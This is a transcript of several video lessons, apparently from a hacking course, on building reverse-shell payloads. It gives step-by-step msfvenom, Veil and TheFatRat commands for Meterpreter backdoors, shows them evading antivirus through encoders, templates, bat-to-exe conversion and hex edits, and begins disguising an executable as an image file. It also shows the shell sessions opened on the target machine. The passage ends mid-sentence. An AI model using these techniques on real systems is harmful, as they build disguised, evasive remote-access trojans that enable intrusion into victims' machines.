Otherwise, if the file doesn't get executed, we don't get access to their machine. And another thing to keep in mind is that listener, or in our case this multi-handler that we have, must be ran before the payload or before this shell.exe, which is kinda logical since if the target runs our file and we weren't listening for the connection, then they won't be able to connect to our machine. You can also notice on target's desktop once again, nothing is really happening, so they might think that the program they executed didn't work and they won't question it that much. But of course we got the connection right here and we can use all of the commands that the Meterpreter gives us. We can as usual enter a shell, type who am I, type ipconfig and all the other commands that we can execute. Type dir to check out all of the available files on the desktop. And if I exit this, exit out of the Meterpreter shell, since we successfully gained access to it once again. But keep in mind that, of course, this was just a basic example, and we will see in the next few videos how to create a little bit more complex payloads. See you in the next video. Welcome back. Let's get back to our payload creation. So, in the previous video, we saw how we can create a simple .exe Trojan using MSF Venom. We used the basic options, where we only set localhost and local port. Now let's check out some other options that we have available. if I go and open up my terminal and run the command msf venom-h, we will get our help menu. And the purpose of all of these other options that we can see right here will usually be to either bypass an antivirus or to make your payload smaller in size or something similar to that. Basically, it is used for creating a payload for your own needs. For example, in the previous video, we created a payload that was a Windows Meterpreter shell as an exe file. But we can create other file types if we want. To check out what other file types can we create, we can run the command msf venom-list formats, and it tells us that right here under the -f command. We can use --list formats to list all of the available formats. So let's do that real quick. --list and then formats. This will take a few seconds to execute, and seeing this will be really useful. Why? Well, imagine you were sending a payload to a Linux machine. An exe file wouldn't be much useful then, right? However, a Python file could be of use in that case. Well, MSF Venom allows us to create any file type that we want. So let's check out all of the available file types. So up here, we can see we can create ASP, DLL, EXE, some other file types as well. We can go down here, we can see different programming languages such as C, C#. We can create in Perl, in PowerShell, in Python. We can also do Ruby, SH, and many other file formats if we want. And what I also want to show you besides this is different options that are also useful, whether it is for bypassing antivirus or changing the size of your payload. Let us check them out. So let's create a couple of payloads right now and compare them. Let me clear the screen first. And to compare them, we're going to use a site called VirusTotal. And to do that, and to visit the site, we must open the Firefox. And what VirusTotal is a website where you upload your viruses and they will tell you how many antivirus vendors are able to detect it as a malicious program. So if I open VirusTotal by typing VirusTotal right here, go to the first link, which is this one, virustotal.com. And one thing to keep in mind is that every file you upload to this website is sent to the antivirus vendors. So something that might be undetectable today, after uploading it to this website, it will for sure become detectable in a few days or a week. Are there other websites that don't send your files to antivirus vendors? Yes, but they are not as good as VirusTotal. And we already know that undetectable virus is a game of cat and mouse. Today it's undetectable, tomorrow it isn't. So this isn't really something to worry about right now. Let's create two payloads real fast. So the first one that we are going to create is going to be the one from the previous video. So let's do it real fast. We already know how to do that. It will be a 64-bit payload, Meterpreter, reverse, TCP. lhost will be equal to the IP address, so let's check it out real quick. .1.12, and if I specify it right here, L port can be 5555, it doesn't really matter. The format will be exe, and the output we can save it as shell1.exe. Press enter. And as soon as this finishes, we're going to upload this payload to the VirusTotal to see how many antiviruses detect it as a malicious program. So it has finished. Let us go to the VirusTotal website, click on choose a file, navigate to the desktop directory and select shell1.exe. I will double click it, I will confirm the upload and it will upload the shell for me. Now this scan will take a minute or two. So while that is doing, what we can do is we can create our second payload. And to create the second payload, we're going to use some additional options. So I will clear the screen right here and I will type msf venom-h right here so we have the help menu available. Then I will go right here and run the command msf venom. We will use the same payload, which is Windows x64 Meterpreter /reverse TCP. We will select the local host 192.168.1.12. Local port will be 5555. After this, we can use the -A option to select the payload architecture. As we can see right here, -A stands for the architecture to use for the payload. So let's go and select x64 because in my case, I'm attacking a Windows 10 64-bit machine. If your Windows machine is 32-bit, you can proceed with x86. Okay? The next thing that we're going to use is a very interesting thing, and that is an encoder. And what is an encoder? Well, let's go right here and find the -E option, which says right here the encoder, and what we need to specify after it is the encoder that we want to use. Encoders can help us bypass some of the antiviruses. To list all of the encoders that we have, we can use -- list encoders. So let's do that first. So MSF Venom -- list and then encoders. And here they are. We get a bunch of encoders for x86 or for 32-bit architecture. We get some for the x64 or 64-bit architecture, and we get some other encoders up here as well. Now the ones that we're interested in at the moment are these x64 ones. So we're going to go with this one, x64/Zuto_Dekiru. So let's copy its name right here and paste it after the -E. Now, if we go back to the help menu and go back to the encoder, another option that is closely linked to the encoder is this -I option. And it is the amount of iterations. As it says in the description, this is the number of times to encode the payload. So if I go right here, after selecting the encoder, we want to select -I to specify the number of iterations that we want to encode our payload. Now, the more iterations, the bigger the payload will be in size, but it also might mean that it will be less detectable to the antivirus vendors. So let's specify -I and then let's perform 15 iterations, for example. After it, we're going to specify the platform on which the payload will run, which is Windows. And after it, we're going to use the -N option and select 500. Now to see what this -N option is, we can go right here, and in the -N we can see it is a NOP sled. It will prepend a NOP sled of length size onto the payload. Remember what a NOP is? A NOP is an instruction for the processor to not do anything. And here we are simply just telling how many NOPs we want to add to our payload. Once we select a bunch of these options, we can add at the end -F to be an exe and -O to be shell2.exe. So this is our second shell. Let's run it and wait for MSF Venom to create our payload. And while it is creating the payload, let's go to the VirusTotal and see how many detections we got with the regular Meterpreter shell. So of 68 antiviruses, 43 detected this as a malicious program. And here we can see which ones detected it as a malicious program and which ones didn't. Let's see whether we get any better result using the second shell. So we can see right here, it has been created, successfully added NOP sled of size 500 from x64 simple. The final size of the exe file is 8000 bytes. So let's go to VirusTotal and remember this number, 43 out of 68, and let's see whether we can at least bypass a little bit more antiviruses than from this first scan. Let's select the shell2.exe, confirm the upload. Now, while this is scanning, let me tell you something real quick. With the MSF options, don't expect to get much better results once applying some additional options or something like that. As I already mentioned, the MSF Venom is a really known tool, and everyone uses these options to generate payloads, so they are very well known to all the antivirus vendors. Here we can see our second shell is scanning, and let's see whether we get a lower number than 43. And here it is, the scan has finished. Right now we get a number of 38 out of 67. So we successfully managed to bypass 5 additional antivirus softwares using the additional commands that we added to our MSF Venom payload. However, let's try to make it even less than this, just by using the MSF Venom. There is another option that we can do, which is -X. And if I go to the help menu right here, we can see the -x stands for template. X allows us to use another program as its template. In other words, this means we can make our payload look similar to that other program. Now, this sometimes knows not to work, but let's give it a try and see whether we manage to bypass more antiviruses with this. For this, we can use any program that we want. I'm going to go with the program called PuTTY. So I'm going to go right here and type PuTTY. You can use any other executable file that you want. And under the download PuTTY, I will click on that link. It tells me you can download PuTTY here. I will click on here. And if I go all the way down, I'm searching for the executable file, so .exe, and here it is, 64-bit putty.exe. I will click on this, and I will save it in my downloads folder. Great, I will click on OK, and if I go right here, open the downloads folder, here I will have the PuTTY executable. And just in case you don't know, on Windows, PuTTY executable looks like this. So it has this icon and it is called putty.exe. Remember how it looks? Let me just delete it real quick and I will open terminal in my downloads folder and run the command msfvenom-p. I will use the 64-bit meterpreter _reverse TCP. L host will be 192.168.1.12. L port will be equal to 5555 and I will only add the -x option and select the program of putty.exe. Now if you're using some other executable, here you specify the name of the other executable. Just make sure that you're located in the same directory where that executable file is in order to run this command. After that I can specify that it is format of exe and output will be capital putty.exe. Press enter. So the creation of the payload has finished, and if I go and show you how the payload looks like on the Windows machine. Let me just find this. And if I go and copy the PuTTY with the capital P to my desktop, here we can see it looks exactly the same as the previous file that I showed you. Just in this case, this is our meterpreter shell. Let me show you real quick. If I go and open MSF console and I set up the multi-handle listener, so multi-handler, set payload to be Windows x64 meterpreter /reverse _TCP, set lhost to be 192.168.1.12 and set lport to be 5555. I type run here and then I run this putty.exe, go back to my Kali Linux and we will have the meterpreter session 1 opened. Get user ID will tell me the time this Windows 10 machine. Okay, great, but this is out of the scope for this video. Let us check out what detection rate does this newly generated payload have. So let's go right here, choose file, navigate to downloads, because there is where our putty.exe is, select the payload and confirm upload. And let's see if we generate a payload with a template, do we manage to bypass more antiviruses than with the previous two payloads? And it seems that we do. In the previous one we had 38 out of 67, right now we have 29 out of 69. So we managed to bypass additional 8 antivirus vendors. Great, this looks better than the last two. I'm going to Control-C this or just close this, and of course if you wanted to generate a fully undetectable payload with MSF Venom, you can always change the file format, but that comes with other problems. Let me show you real quick. So if I go right here under the downloads and let's say we wanted to generate a Windows payload but not as an exe file but as a Python file. We can run the command msfvenom-p Windows x64 meterpreter /reverse TCP. lhost equals 192.168.1.12, lport equals 5555. -f is something that we want to change, so it is no longer going to be exe, it is going to be a Python file. And we output it with -o as a Python _payload.py. Press enter, and this will create the Windows meterpreter payload just as a Python file. Here it is done. And if we go to VirusTotal, upload the Python payload right here, confirm the upload, and we can see no antivirus is able to detect it as a malicious program. It is FUD, or in other words, it is fully undetectable payload. However, how are you going to run it on the target machine? Windows machines don't have Python installed by default like Linux machines do. So this payload would only be useful if the target machine has Python installed. Otherwise it is completely useless as it cannot run without Python. Okay, great. We covered MSF Venom and some of its commands. I advise you to experiment even more with the MSF Venom, and for example you can start creating other payloads if you want. We only created Windows payloads, but if you have a Linux machine or a Mac OS machine that you want to attack, you can generate payloads for those operating systems as well. To check out all the available payloads that you can create, you can type the command right here, msf venom -- list and then payloads. And here we can see a lot of different ones. We can go up here are only Windows payloads, but if we scroll all the way up, here are Solaris payloads, Ruby payloads, and these are just some programming languages. But here, if we scroll all the way up, we get to the OS X payloads. So you can attack OS X operating systems. If we go even more up, here are Linux operating systems and Linux Meterpreter Reverse TCP payloads. We also get the Bind Shell payloads. We get up here the Linux payloads for the 64-bit systems as well. So you can attack any operating system that you want. Great. Now that we took a look at MSF Venom and we covered some of its options, let's also take a look at some other tools that we can use for payload creation. See you in the next video. Welcome back. And right now, we're going to check out another tool that is used for generating payloads. And that tool is called Whale. Since it is not installed in Kali Linux by default, we must install it first. To do that, you can open up your terminal, enter the root account by typing in your password after the sudo su, and then after it, you want to type the command apt-get install whale. Now, since I already have Whale installed, this will not do anything for me. But for you, it should start the process of installing Whale, and that process might take some time. However, running this command is only the first part. After this installation finishes, you can clear the screen and type Whale inside of your root terminal. This will, for me, open up the Whale program, but for you, it will continue the process of installation. So Whale has a bunch of dependencies, and once you run the apt-get install Whale, and after it you run the Whale program for the first time, it will ask you to install those dependencies. You want to click there yes, and that process will also take some time. It will also have a bunch of pop-up windows right here, where you want to click on next on each one. You don't want to change any of those settings, and after all the installation has finished, you should have Whale up and running. Okay, great. After you get Whale up and running, we can see right here that we get two available tools. The first one is Vasion, and the second one is Ordnance. And what Whale is simply a program that will allow us to generate payloads similarly to the MSF Venom. So let's give it a try. If I type use 1, and you will notice that the commands are similar to the MSF console. So to use one of these options, you can simply just type use 1 or use 2. And since I selected use evasion, as we can see number 1 is evasion, it will tell me 41 payloads loaded. And these are our available commands. So we can read information, we can list the payloads, we can use some payload. So let us list our payloads first. And here we can see those 41 payloads. Some of them are coded in Ruby, some of them are coded in Python. We have PowerShell payloads, Perl, Go, CES, C#, C payloads, and we get some auxiliary modules as well. Now, the regular payload that we used in the MSF Venom would most likely be this C Meterpreter Reverse TCP.py. It is pretty much the same thing. But since we already covered something similar to this inside of the MSF Venom, let us go with a different payload this time. So let's go with a PowerShell payload. Let's select payload number 22, which is PowerShell Meterpreter Reverse TCP. So we can just type use 22. And after you select the payload, it will give you all of the available options that you can set for that payload before you generate it and create it. Here we can see domain, hostname, lhost, local port, min browsers, min processes, min RAM, processors, sleep time, and these options you can use and change as you like. Some of them might actually help you bypass some of the antiviruses, such as for example this sleep option right here. Sleep this amount of seconds. So whatever we set right here, that amount of seconds our payload will sleep after execution before establishing the connection with our listener. So let's set that right away. Let's set sleep to be 20 seconds. What does this mean once again? Well, once the target executes our program, the program will sleep for 20 seconds, it will not do anything, and then after 20 seconds it will establish the connection with our listener. Another thing that we must set is the local host, and for that we must know our IP address. And it is .1.12, so I will go right here, type set lhost 192.168.1.12. And if I type generate, as we can see by the available commands right here, to generate the payload, we simply type generate. Press enter. Please enter the base name for the output files, and let's call it power payload, meaning a PowerShell payload. I will click here enter, and the payload has been created. We can see right here language, PowerShell, payload module is the one that we selected, source code is written to this path right here, and we will notice that it is written inside of the .bat file. And Metasploit resource file written to this location right here. And the two things that we're interested in are these two things: the Metasploit resource file and the source code. Now, this source code, which is .bat, is something that we want to convert to exe. Now, even though on Windows systems, .bat file is runnable, but this will get triggered by any antivirus program out there. Since it is just a basic code that executes commands, it will get triggered by any antivirus. We want to convert it to exe, and how are we going to do that? Well, we can go to Firefox, and there is a really good tool that is used to convert bat programs to exe files, and we're going to download it from GitHub. So if I type right here bat to exe or B2E GitHub, and I navigate right here to the first link, I copy the tool. We can see that the tool is an actual zip file, so we must unzip it as soon as we download it. So let's go right here, go to the second terminal. Let's install the tool on our desktop, and I will type git clone and then paste the link to the tool. After the tool is installed, we can change the directory to that tool, and if I type ls, here is the bat to exe converter as a zip file. To unzip it, we can type the command unzip and then bat to exe, and it will unzip our file. Clear the screen, type ls, and we will get an exe file. Is this a problem? We know that exe files can only be run inside of Windows, but remember we have a Wine program installed. Let's get a quick reminder of what Wine is. Wine is a program that allows us to execute Windows files inside of Linux. So let's give it a try. If I type Wine and then the program name, press enter, let's give it a few seconds, and here it is. It opened the program. So we must set up the program. I will set the language to be English, click on OK. I accept the agreement. Of course, we're not going to read all of this. Then click on next. Click once again on next. And click right here on next. After it, on the last step, we can click on install. We want to check right here launch bat to exe converter and click on finish. And here it is. It opened our bat to exe converter. So now what we want to do is this payload that we generated, which is inside of this location as a .bat file, we want to convert to exe using this program. So we must open it inside of this program first. To do that, we want to go onto File and then Open. Now we must go to this location right here. So let's click on this arrow. Let's go to the slash location, find var, then find lib, Then the next part is Whale, so we must go and find the Whale program. Here it is. And inside of the output and source is our power payload.bat. Let's double click it and it will open the code of our payload. Here it is, right here. Now we have some of the options right here that we can change if we want to. You can add an icon by checking this and then selecting the icon from your system, but we're not going to be doing that at the moment. Another thing that you can do, you can set the password, you can change the working directory, you can change the exe format to be something out of these four, and I will select to be 64-bit Windows Invisible because I'm attacking a 64-bit Windows machine. You can request administrator privileges at the runtime, so this is sometimes good if you want your target to run the payload as an administrator, but keep in mind, once they double-click the program, if this was selected, then they will have to input the administrator password. So that is just another step before they actually execute the program. We're not going to be checking that right now. Another thing that you can do is this packer, you can enable the UPX compression. But enabling this will just trigger more and more antivirus softwares because UPX is a really known packer and it was used a lot to pack malicious programs. So there is nothing really here that we want to change. And once you set all of the settings to your liking, you can go right here on the converter and then on convert. Here you want to select the name of your payload and we can just call it PS payload, standing for PowerShell payload. It is an exe format, so we can just save it. And if I click on OK, it will create our exe file, as we can see down here. Process finished. Here we can see where our file has been saved. It is in /var, libwhale output source, and then pspayload.exe. Okay, great. Now the next thing that we must do to check out whether this payload works is to run MSF console. And while it is running MSF console, what I'm going to do is I'm going to navigate to the Whale directory. So I will open folder, I will go to file system, then go right here to var, navigate to lib, all the way down I will go to Whale, then output, source, and here is our PowerShell payload.exe. Let us copy it to our target desktop. So I will just drag it onto the desktop of my target machine, and here is our PowerShell payload.exe. If I go right here, open the Metasploit framework, and I go back to the Whale first, copy this Metasploit resource file, copy its entire path, and type resource, and then paste this. What this is going to do is it will set up the listener automatically that is made for this exact payload. As we can see right here, it started reverse TCP handler on this IP address on this port, and it's doing all of that in the background. So all I'm left to do is execute this payload. Now, in this case, we can see the console of this payload, which is something that we don't really want. It only showed for a brief few seconds, but that is something that you can change inside of your BAT to EXE converter. So let's wait for a few seconds, and in just a few seconds we should receive the Meterpreter session. And remember why it is taking so long is because inside of the Whale we set 20 seconds to wait before establishing connections. And here it is. We got the Meterpreter session 1 opened. Let's see whether we can execute commands. So if I clear the screen, type sessions, we have one session active, and I will enter it using the -i command, get user ID, and we are on that target machine. We can enter the shell as usual, type who am I, we are this account, and everything seems to work. Great. So we managed to create another type of payload that wasn't the same as in the previous video. And to just prove you that, I can go right here to the virus total, and we can upload the payload to see how many antiviruses managed to detect it. With a regular MSF1 on payload, we got about 53 or 54 detection rate out of 60 antiviruses. Let's see how much we get right now. Let's go and find the payload, and it is once again in /var/lib/whale in the output folder and in the source folder. Here it is. I will select it, confirm the upload, and we should have a much lower detection rate than with the regular MSF1 on payload. And once again, with the usage of this BAT2EXE converter, you can change some of these settings and you might even get a lower detection rate, but it will never be 0. Why? Well, if I just go right here and I delete the entire code and type some random code, which doesn't do pretty much anything, and if I were to convert this code to exe, it will still get detected by a lot of antivirus vendors. You might be asking why, since this right here is not any type of a malicious code. Well, that is because we're using this tool BAT2EXE converter, and some antivirus vendors find files malicious even though they might not be, just because you converted the BAT file to an exe. That is pretty much the only reason. And we can see right here, we get a much lower detection rate than with the regular MSF1 on payload. We get 27 out of 67. So we managed to bypass about 20 to 30 more antiviruses just by creating a PowerShell payload with Whale instead of using a regular MSF1 on payload. Great, so what did we learn in this video? Well, we covered this tool called Whale. You can experiment with other options as well, and you might get even lower detection rate. We also covered this BAT2EXE tool that we can use to convert the BAT files to exe, and we also know that no matter what type of file we convert to exe, it will still get detected by some of the antiviruses just because we used a tool like this. Okay, great. Now that we covered this, we can proceed with our payloads in the next video. See you there. Welcome back. In this video, I want to talk about yet another tool that we can use for payload creation, and that tool is called the Fat Rat. I know, right? What a name. Anyway, this is a tool that we have available on GitHub, so let's go real quick and download it from the GitHub repository. If I type in the search bar Fat Rat GitHub, it should lead me to this first link where I want to click on, and once it opens this page, we want to copy the link to this tool and git clone it inside of our desktop directory. Now you will notice right here that I already have the tool downloaded, so I will not be cloning it right now. The good thing for this tool is that on the GitHub page, if I scroll down here, we have the commands for the exact installation of this tool. So first we git clone the tool itself, then we change directory to the tool folder, and we run this command right here. Since I already did all of this, you do this first, and then we can go and start the tool. Okay, did you do it? Let's go and start the Fat Rat tool. Now keep in mind, once starting this tool, you must enter the root terminal, and we do that as usual with sudo su command. Once I go there, I will navigate to the desktop and to the Fat Rat directory. If I type ls, we should see this file called Fat Rat, and that is the tool itself. So in order to run it, we can just type its name inside of the terminal. Press enter, and this will start the tool for us. You will notice that the tool is rather similar to all of the previous tools that we used for payload creation, so there is nothing really new here. We're just experimenting with different tools to see what type of payload is best for us. It will go right here through some of the dependencies, and if it doesn't have some of the files that it needs installed, it will automatically install it for you. For me, it already has all of this installed, so it will just prompt me with this warning that says, don't upload the backdoors created with the Fat Rat to the virustotal.com. So we're not going to do that. If the tool tells us to, we're not going to go and upload them to VirusTotal. Anyway, let's see how we can create them, so I will press enter to continue. Here it started the service PostgreSQL, and I will press continue once again. And here it is. This is the main menu. So we got quite a few options right here. We can create backdoor with MSF1, we can create fully undetectable backdoor with FUDWIN, we can create with other programs as well. So this is just a matter of choice. You can also, if you notice right here, create a backdoor of the APK file, which would be for mobile phones. Okay, great. Let us go with any one of these. Let's go, for example, with number 6, which is create fully undetectable backdoor with PWN wins. It says in the brackets excellent, but keep in mind that even though right here it says fully undetectable, it most likely won't be fully undetectable because this tool right here isn't that new. Nonetheless, let us go with number 6 as an option, and you can go with a different option if you prefer. I will just go with this one for the purposes of this tutorial, and here we have also a few different options. We can create backdoor with C, PowerShell, and embed PDF. We can create backdoor with C, Meterpreter reverse TCP. We can create exe file with C# and the PowerShell. It says it is fully undetectable 100%. So let's go with that one this time. I will select number 2. It will tell me right here my IPv4 local address, my IPv6 address, and my public IP address right here. So what I'm going to do is I'm going to set the localhost IP to be 192.168.1.12, and I will select the local port to be 5555. Press enter. Please enter the base name for output files. We can call this rat backdoor, just so we know from which program it is. Here it asks us to select which type of payload we want to create, and we are going to go with the good old Windows Meterpreter reverse TCP. So I will select number 3 right here, press enter, and this should create the backdoor for me. After a few seconds, we should have this output that says backdoor saved to this path right here, and up here we can see the code of our payload. It is inside of C#, and we can see it calls the system function, which execute a PowerShell command. Okay, great. So let's remember this location right here. Matter of fact, let's copy it. And now we can press enter. Now, you will notice that this tool doesn't set the listener automatically for us. So what we're going to do is you can either set up a listener based on the information that you specified for the payload inside a second terminal using MSF console, or we can go back to the menu using the number 9. And once it comes back to this menu, we can go and jump to MSF console straight from the fat rat with the number 10. Okay, great. While the MSF console is opening, what I'm going to do is I'm going to open another terminal where I'm going to enter the root terminal first and then navigate to the path that we copied. Okay, great. Type ls here and we should have ratbackdoor.exe. Let's copy it to our desktop. So home, Mr. Hacker, and then desktop. And from the desktop, if I go and lower all of these windows, we should be able to copy it straight to our Windows 10 machine. Okay, great. So it is on our target machine. Let's set the settings inside of the MSF console. Use exploit multi-handler. Set payload to be, remember, Windows Meterpreter reverse TCP. And we need to set the L host and the L port accordingly to what we set inside of our payload. So for me, it is 192.168.1.12 and the L port is 5555. Press run. And if we go and run our backdoor, it will execute, go back to our MSF console, and here is the Meterpreter shell. Once again, we can execute the commands that we want. If I type, for example, ps command, this will list all of the processes running on that target machine. So if I scroll all the way up, we should be able to find the ratbackdoor.exe file that we executed on the target machine. It should be somewhere here. And here it is. Here is the ratbackdoor.exe. This is our file running on the target system. Now we know how to create payloads. Now, there are other tools as well that we can use, but I will leave that for you to discover, since they all work pretty much the same. Great. In the next video, we're going to check out how we can make some changes on our payloads that will allow us to either bypass some of the antiviruses, or we're going to see what we can do to the payload to make our target have greater chance of executing it. See you in the next video. Welcome back. In this video, I want to talk about bypassing antivirus. And this video is not going to be that practical. You might be asking, why? Well, I could show you a way to bypass antivirus right here in this video, but chances are that will not work once you watch the video in a month or 2 months or in a year. A fully undetectable payload is not something that lasts forever, especially when I show it inside of something like a course that many people are going to watch. So instead, I would like to tell you about a few different techniques that you can apply to generate an undetectable payload. So how it all goes? Well, many people start using a payload, and sooner or later, antiviruses start detecting it as a malicious program. That could be due to people using it a lot, or it could be that some of you uploaded it to the VirusTotal and it got sent to all the antivirus vendors. However, let me talk about the rules that you can apply to bypass antivirus. Now, the best thing that you can do to create a fully undetectable payload is to code your own programs or your own payloads. For example, I coded a backdoor in C language, and when I scanned it, it was fully undetectable. No antivirus was able to flag it as a malicious program. Then I created a course on creating that backdoor, and soon enough, that backdoor was no longer fully undetectable and was getting caught by most antiviruses. It was FUD at first because it was a new payload with a new code or a new source code. Once you have a unique and different code and you compile it, that code becomes a different binary which makes it undetectable until many people start using it. So just remember, best way to create undetectable payload is to code it yourself in a unique way. However, this requires you to know a programming language, and for many, this will present a problem. There are other ways as well, so one of them is to update your payload tools if possible, and you also want to keep an eye for the tools that are new, or the tools that just came out. Why? Well, they might have different payloads that aren't widely used yet, so that is another way that you can do it. You can also try creating different types of payloads, try out PowerShell payloads, Python payloads, C# payloads. All of them have higher chances of not getting detected. Another cool thing you can do once you generate your payload is to change its binary a little bit. Let me show you what I mean. We can do this by using Hex Editor. So let us just real quick generate a normal Windows Meterpreter reverse TCP payload. Let us go with lhost, lport, and let's specify file to be exe and output to be shell.exe. Okay, great. This is a regular Meterpreter payload. It gets detected by almost every antivirus in the world. It is, matter of fact, the most known payload in the world for malicious activities. But what you can do, if I show you right here the MD5 sum hash of this payload, you will see it is this one. So some antiviruses work by getting the hash of the executable and storing it in their database. Then once you change this hash, and you change this hash by changing the binary of the program, this hash becomes different and it is no longer inside of the databases of antiviruses. Let me show you a simple way to change it. So what we can do is we can type Hex Editor, which is a tool that is already installed in Kali Linux, and we can specify the payload name. This will open the payload's binary. And here we want to change some of the binary. Just be careful, don't change something that you don't know what it is, because even changing a single byte right here could result in a program not working, if that byte was essential for the program to run. Now, there are a few things right here that we can change for sure, and that is this right here. This is a program that cannot be run in DOS mode. Now, what is this? Well, this is a string. It is nothing really too important for the program. So we can go navigate with our arrows, and we can change this string. As you can see, when I type hexadecimal right here, it changes the output inside of this right column. So if I just type some random hexadecimal numbers and letters to change this, and once you change some of it, this will change colors. And if I go all the way down, there is another thing that we can change, and that is this text right here. This is also something that we can change. Just make sure you navigate to the correct line. In my case, I believe it is this one. The text should start with 7.4, and we can change it to whatever we want. just once again, make sure you don't go over that word, because changing, for example, this byte right here will result in a program to not work. Okay, once you finish this, you can Control O, save this. Now if you remember how the MD5 hash started before we did this, if I do it again, it is completely different. I believe it started with something like 8.3 or I don't even remember, but right now it is completely different. We managed to change the hash of this executable by changing its binary. And this, even though for many antiviruses this is something that will not bypass them, even if you manage to bypass 2 or 3 additional antiviruses, that is good. You did a slight change. So this won't do much of a difference, but everything you can change, you should, since you gain higher chances of bypassing antivirus. As well as if you have, for example, the source code of a payload, what you can do is you can try to change it yourself a little bit. Just add some random functions or make your program not do anything for first minute or two after running. All of these things can help you bypass antivirus. Okay, so these are just some of the ways that you can apply next time you create a payload. Just remember one thing. Whatever type of payload you create to be undetectable, it won't last long. So this is something you will have to experiment with over and over again. In the next video, we're going to see one of the ways we can mask our payload to look like a different program. See you there. Welcome back. In this video, I want to show you a cool way that you can make your executable seem and look like another file. So what I'm going to do right now is I'm going to mask our shell.exe that we created from the previous video to look like a car image. And what you will need for this is you're going to need a car image, or basically it doesn't even have to be an image or a car, it can be any file type that you want. If you want to create it to be a PDF file, you can. If you want to create it to be a JPEG file, you can. Just follow along, and the process of doing that is the same for every file type. So, two things you're going to need: a file that you want your executable to look like, and the executable itself. So this is the same payload from the previous video, which is a regular Windows Meterpreter shell. And what I'm going to do is I'm going to copy it to the desktop real quick. And once you got these two files on your desktop, you are ready to go. Now, the first thing that we must do is we must make an icon file from this PNG file. And how can we do that? Well, we can just open the Google Chrome or any search engine and type PNG to icon. You can navigate